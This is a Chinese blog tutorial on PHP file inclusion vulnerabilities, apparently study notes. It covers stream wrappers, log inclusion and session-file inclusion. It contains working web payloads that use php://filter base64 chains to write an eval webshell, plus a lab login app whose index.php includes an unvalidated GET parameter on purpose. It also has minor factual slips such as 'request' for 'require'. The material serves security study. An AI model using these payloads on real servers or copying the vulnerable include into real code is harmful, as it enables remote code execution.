文件包含漏洞

已于 2024-06-29 22:23:48 修改
阅读量1k 收藏 14
点赞数 21
分类专栏: 渗透学习 文章标签: 文件包含 渗透 安全 php
于 2024-06-29 22:17:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/139999546
版权

目录

文件包含简介

在PHP中进行文件包含需要知道4个函数

include简介

一些伪协议的介绍

file伪协议简介

php://filter妙用

strip_tags作用

php://input 伪协议简介

例子

zip://简介

例子

​编辑

日志包含

例子

包含session文件

例子

文件包含简介

文件包含漏洞是指在程序执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行或使用,从而导致程序行为异常。攻击者可以利用这种漏洞在目标系统上执行任意代码,从而控制系统。

在PHP中进行文件包含需要知道4个函数

include

request

include_once

request_once

上两者和下两者的区别就是下面只能包含一次

include简介

include就是节省你的工作量将其他代码包含进行执行

例子下面就是将数据库的连接文件包含进来,这个动作的意义就是将下面的文件复制一份放在这里。里面如果有PHP代码就会执行

include可以包含任意文件,任意文件中含有PHP代码,PHP代码就会执行

一些伪协议的介绍

file伪协议简介

file:// 协议在双off的情况下也可以正常使用

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

file:// 用于访问本地文件系统例子

php://filter妙用

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

下面用例子来看一下这个东西的妙用

这整了一个代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
#这里,file_put_contents 函数用于将 $content 的内容写入到由 $_POST['filename'] 指定的文件中。这意味着用户可以指定一个文件名(或路径),并且这段代码将尝试将内容写入到那个文件。
?>

上面代码在开头增加了<?php exit; ?>这样会导致文件运行就会退出

我们现在借助php://file的base64的一个解码码特性来进行绕过,base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,而在上面的代码中<?;空格是不在64个可打印的字符中的。

构造注入代码

txt=QPD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8%2B&filename=php://filter/write=convert.base64-decode/resource=shell.php
#php://filter/write=convert.base64-decode/resource=shell.php
#   php://filter 是流封装协议的标识。
#   write 表示我们要写数据。
#   convert.base64-encode 是我们要应用的过滤器,它将把读取的数据转换为 Base64 编码。
#   resource=shell.php 指定了我们要操作的文件的路径。

在解码的过程中<?php exit; ?>会被绕过(注:base64在解码的时候要补足8位)

或者有另外一种绕过的方法使用 strip_tags

strip_tags作用

这个会函数返回一个字符串,其中所有 HTML 和 PHP 标签都已被去除(除非在 $allowable_tags 参数中指定了要保留的标签)。

注入代码

txt=PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8%2B&filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

上面语句在执行时会发现txt的内容不是PHP语言不理,然后发现后面有一个<?php exit; ?>,他会将这个东西删除掉。然后再通配符进行解码然后再写入shell.php文件。

php://input 伪协议简介

可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

例子

zip://简介

引用 ZIP 文件中的某个文件,这时就可以使用 zip:// 协议加上 ZIP 文件的路径和 ZIP 内部文件的路径来定位它。就算后缀是jpg里面的内容也可以打开

例子

日志包含

apache包含,日志包含。当日志太大的时候PHP的内存就溢出了,PHP就包含不了了。但是这些中间件都有一个设置:日志分割(其目的是为了方便运维),所以咱可以在日志更新的时候进行注入,这样日志中没有太多的内容

去寻找各个系统或中间件的默认日志路径

日志包含只有找到路径才可以,找不到路径是没有办法包含的

注入代码现在日志中生成,然后包含日志文件

例子

先发起请求(这里会有编码,可以用抓包工具修改)

这时你的请求记录会记录在日志文件中

包含

包含session文件

首先session中有可利用的代码

第二你要猜到session路径

代码中sql被预编译阻断了sql注入

例子

这个例子中的路径在实战中需要你自己尝试,可能是配置的默认路径也可能被修改。

先配置环境

环境就照普通网站弄

index.php

<?php
// 1. 必须要包含session文件,你需要知道session路径
// 2. 用户名用一句话木马代替
error_reporting(0);
session_start();
if (isset($_GET['action'])) {
    include $_GET['action'];
    exit();
} else {
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="css/bootstrap.css" rel="stylesheet" media="screen">
    <link href="css/main.css" rel="stylesheet" media="screen">
</head>
<body>
<div class="container">
    <div class="form-signin">
        <?php if (isset($_SESSION['username'])) { ?>
            <?php echo "<div class=\"alert alert-success\">You have been <strong>successfully logged in</strong>.</div>
<a href=\"index.php?action=logout.php\" class=\"btn btn-default btn-lg btn-block\">Logout</a>";}else{ ?>
            <?php echo "<div class=\"alert alert-warning\">Please Login.</div>
<a href=\"index.php?action=login.php\" class=\"btn btn-default btn-lg btn-block\">Login</a>
<a href=\"index.php?action=register.php\" class=\"btn btn-default btn-lg btn-block\">Register</a>";
        } ?>
    </div>
</div>
</body>
</html>
<?php
}
?>

 login.php

<?php
	require_once('config.php');
	session_start();
	if($_SESSION['username']) {
		header('Location: index.php');
		exit;
	}
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = md5($_POST['password']);
        $mysqli = @new mysqli($dbhost, $dbuser, $dbpass, $dbname);
        if ($mysqli->connect_errno) {
            die("could not connect to the database:\n" . $mysqli->connect_error);
        }
        $sql = "select password from user where username=?";
        $stmt = $mysqli->prepare($sql);
        $stmt->bind_param("s", $username);
        $stmt->bind_result($res_password);
        $stmt->execute();
        $stmt->fetch();
        if ($res_password == $password) {
            $_SESSION['username'] = base64_encode($username);
            header("location:index.php");
        } else {
            die("Invalid user name or password");
        }
        $stmt->close();
        $mysqli->close();
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="login.php" method="post" class="well" style="width:220px;margin:0px auto;">
			<h3>Login</h3>
			<label>Username:</label>
			<input type="text" name="username" style="height:30px"class="span3"/>
			<label>Password:</label>
			<input type="password" name="password" style="height:30px" class="span3">
			<button type="submit" class="btn btn-primary">LOGIN</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

register.php

<?php
if ($_POST['username'] && $_POST['password']) {
    require_once('config.php');
    $username = $_POST['username'];
    $password = md5($_POST['password']);
    $mysqli = @new mysqli($dbhost, $dbuser, $dbpass, $dbname);
    if ($mysqli->connect_errno) {
        die("could not connect to the database:\n" . $mysqli->connect_error);
    }
    $mysqli->set_charset("utf8");
    //php 预编译
    $sql = "select * from user where username=?";
    $stmt = $mysqli->prepare($sql);
    $stmt->bind_param("s", $username);
    $stmt->bind_result($res_id, $res_username, $res_password);
    $stmt->execute();
    $stmt->store_result();
    $count = $stmt->num_rows();
    if($count) {
        die('User name Already Exists');
    } else {
        $sql = "insert into user(username, password) values(?,?)";
        $stmt = $mysqli->prepare($sql);
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        echo 'Register OK!<a href="index.php">Please Login</a>';
    }
    $stmt->close();
    $mysqli->close();
} else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;">
			<h3>Register</h3>
			<label>Username:</label>
			<input type="text" name="username" style="height:30px"class="span3"/>
			<label>Password:</label>
			<input type="password" name="password" style="height:30px" class="span3">
			<button type="submit" class="btn btn-primary">REGISTER</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

 数据库配置文件

<?php
$dbhost = 'localhost';
$dbuser = '用户名';
$dbpass = '密码';
$dbname = '数据库民';
 ?>

 环境搭建好后有登录和注册两个功能

先测试一下

注册

登陆

尝试包含

首先找到相应session文件的路径,在寻找路径的时候可以尝试以下各个中间件的默认路径,然后文件名就是sess_加上对应的cookie,如下图

(cookie和session关系  session就是cookie,在你注册一个用户,服务器生成一个session文件,session文件名为一个随机字符串,文件里面存储一些你的信息。服务端会将你的文件名返回给你的客户端,保存在你客户端的cookie,当你二次登陆时浏览器会带着你的cookie进入到服务端,服务器就会在自己的文件中找有没有你cookie名字的文件)

文件的内容就是username 序列化的一个值和username用base64编码后的的值

我们是否可以用include对这个session文件进行包含,如果我们的用户名是一个PHP代码,然后我们对这个session文件进行包含,是不是就达到了我们的目的

看session文件,对于这个我们要如何利用?往前看和base64有关系的伪协议是有一个的,我们就借助这个技巧来进行以下破解

username对于我们来说是可控的。由于这里写入的值被进行了base64编码。所以我们要对session进行解密但是由于这个session文件中有username|s:12这个前缀只有11位,要进行base64解码的话势必会出现乱码。所以我们要想办法把session文件里面这个前缀变得符合base64的规范,让这个前缀发生变化我们可以从序列化后的长度入手,当后面用户名长度大于100时前缀的长度就为12符合base64解码规范.这个题就解出来了

注册名非常长,然后里面携带了要注入的代码

代码中有个action进行包含

尝试包含

包含成功

板栗妖怪
关注
  • 21
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
### 文件包含漏洞的原理与实践 #### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序中较为普遍。这种漏洞允许攻击者通过控制程序中用于指定要包含文件的...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞实战
yuan_boss的博客
08-31 1322
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4137
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3024
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
php 伪造本地文件包含漏洞的代码
10-28
本地文件包含漏洞允许攻击者通过修改动态包含文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,还可能被利用来执行恶意代码或进一步控制服务器。 #### 三、漏洞原理分析 在上述示例代码中,...
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
信息安全技术:文件包含漏洞简介.pptx
11-01
本文将深入探讨文件包含漏洞的概念、风险以及如何识别和防范这类漏洞。 **1. 什么是文件包含?** 文件包含,通常指的是在编程中,尤其是PHP语言中,通过特定语句(如`include`或`require`)将一个外部文件的内容...
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
信息安全技术:远程文件包含漏洞.pptx
11-01
【信息安全技术:远程文件包含漏洞】 远程文件包含漏洞(Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL来包含并执行非...
信息安全技术:文件包含漏洞截断.pptx
11-01
【信息安全技术:文件包含漏洞截断】 在信息技术领域,尤其是网络安全方面,文件包含漏洞是一种常见的安全威胁,它允许攻击者通过操纵程序中的包含语句来访问或执行未授权的文件。这种漏洞通常出现在PHP等服务器端...
fimap 文件包含漏洞检测专项工具.doc
12-02
【fimap 文件包含漏洞检测专项工具】 fimap 是一款针对 Web 应用程序中的文件包含漏洞进行检测的开源工具。它的主要功能是发现并利用 PHP 文件包含漏洞,从而帮助安全研究人员或系统管理员评估网站的安全性。文件...
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值